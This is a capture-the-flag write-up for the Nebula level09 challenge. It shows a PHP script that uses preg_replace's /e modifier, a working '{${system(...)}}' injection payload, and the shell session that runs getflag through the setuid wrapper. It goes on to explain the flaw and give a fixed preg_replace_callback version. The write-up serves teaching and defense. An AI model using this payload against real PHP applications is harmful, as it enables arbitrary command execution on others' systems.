
Level09 provides us with a C setuid wrapper for some vulnerable PHP code.

    <?php

    function spam($email)
    {
      $email = preg_replace("/\./", " dot ", $email);
      $email = preg_replace("/@/", " AT ", $email);

      return $email;
    }

    function markup($filename, $use_me)
    {
      $contents = file_get_contents($filename);

      $contents = preg_replace("/(\[email (.*)\])/e", "spam(\"\\2\")", $contents);
      $contents = preg_replace("/\[/", "<", $contents);
      $contents = preg_replace("/\]/", ">", $contents);

      return $contents;
    }

    $output = markup($argv[1], $argv[2]);

    print $output;

    ?>

As you can see in the code above, the second argument – $use_me – is passed to markup() but never referenced inside it.

After doing some research, multiple sources identified the /e (eval) modifier used with preg_replace() as a dangerous feature that was deprecated in PHP 5.5.0 and removed as of PHP 7.0.0.

This link described the feature in detail and even included an example of how it can be exploited.

Let’s inject our getflag command into the $use_me argument using the exploitation method from the link:

    level09@nebula:/home/flag09$ echo '[email {${system($use_me)}}]' > /tmp/useme
    level09@nebula:~$ cd /home/flag09/
    level09@nebula:/home/flag09$ ./flag09 /tmp/useme getflag
    You have successfully executed getflag on a target account
    PHP Notice:  Undefined variable: You have successfully executed getflag on a target account in /home/flag09/flag09.php(15) : regexp code on line 1

Looks like the injection was successful - we receive the output that indicates getflag was successfully executed. The trailing PHP Notice is harmless: system() prints getflag's output and returns its last line, which the ${...} construct then tries to look up as a variable name.
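The root cause is that the /e modifier evaluates the replacement string `spam("\2")` as PHP code after substituting the capture, so whatever the input file puts inside `[email ...]` lands inside a double-quoted PHP string literal, where `{${...}}` is interpolated. The fix is to stop evaluating strings altogether. The following is an added example, not the original flag09.php: the same markup() function rewritten with preg_replace_callback(), plus a constructed input file containing both a normal address and the page's injection string. The name markup_safe and the temp-file setup are assumptions for the demonstration.

```php
<?php
// Added example, not the original flag09.php. Same behaviour as markup(),
// but the capture is handed to spam() as plain data via a callback instead
// of being spliced into an eval'd replacement string. Runs on PHP 5.3+.

function spam($email)
{
    $email = preg_replace("/\./", " dot ", $email);
    $email = preg_replace("/@/", " AT ", $email);

    return $email;
}

// Hypothetical hardened replacement for markup(); the unused $use_me
// argument is dropped.
function markup_safe($filename)
{
    $contents = file_get_contents($filename);

    // Equivalent of "/(\[email (.*)\])/e" with "spam(\"\\2\")", except that
    // $m[2] is never evaluated: {${...}} inside it is just text.
    $contents = preg_replace_callback(
        '/(\[email (.*)\])/',
        function ($m) {
            return spam($m[2]);
        },
        $contents
    );
    $contents = preg_replace("/\[/", "<", $contents);
    $contents = preg_replace("/\]/", ">", $contents);

    return $contents;
}

// Constructed sample input: one legitimate address and the injection string
// from the writeup. Single quotes keep $ and { } literal in the PHP source.
$tmp = tempnam(sys_get_temp_dir(), 'markup');
file_put_contents(
    $tmp,
    '[email alice@example.com]' . "\n" .
    '[email {${system($use_me)}}]' . "\n"
);

print markup_safe($tmp);

unlink($tmp);
?>
```

Run it with `php` on the command line: the first line comes out as `alice AT example dot com`, and the second line is reproduced literally as `{${system($use_me)}}` with nothing executed, because the callback returns a string that PHP never parses as code. On PHP 7 and later the original /e version no longer runs at all, which is the other reason to migrate any remaining code to preg_replace_callback().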

Mike
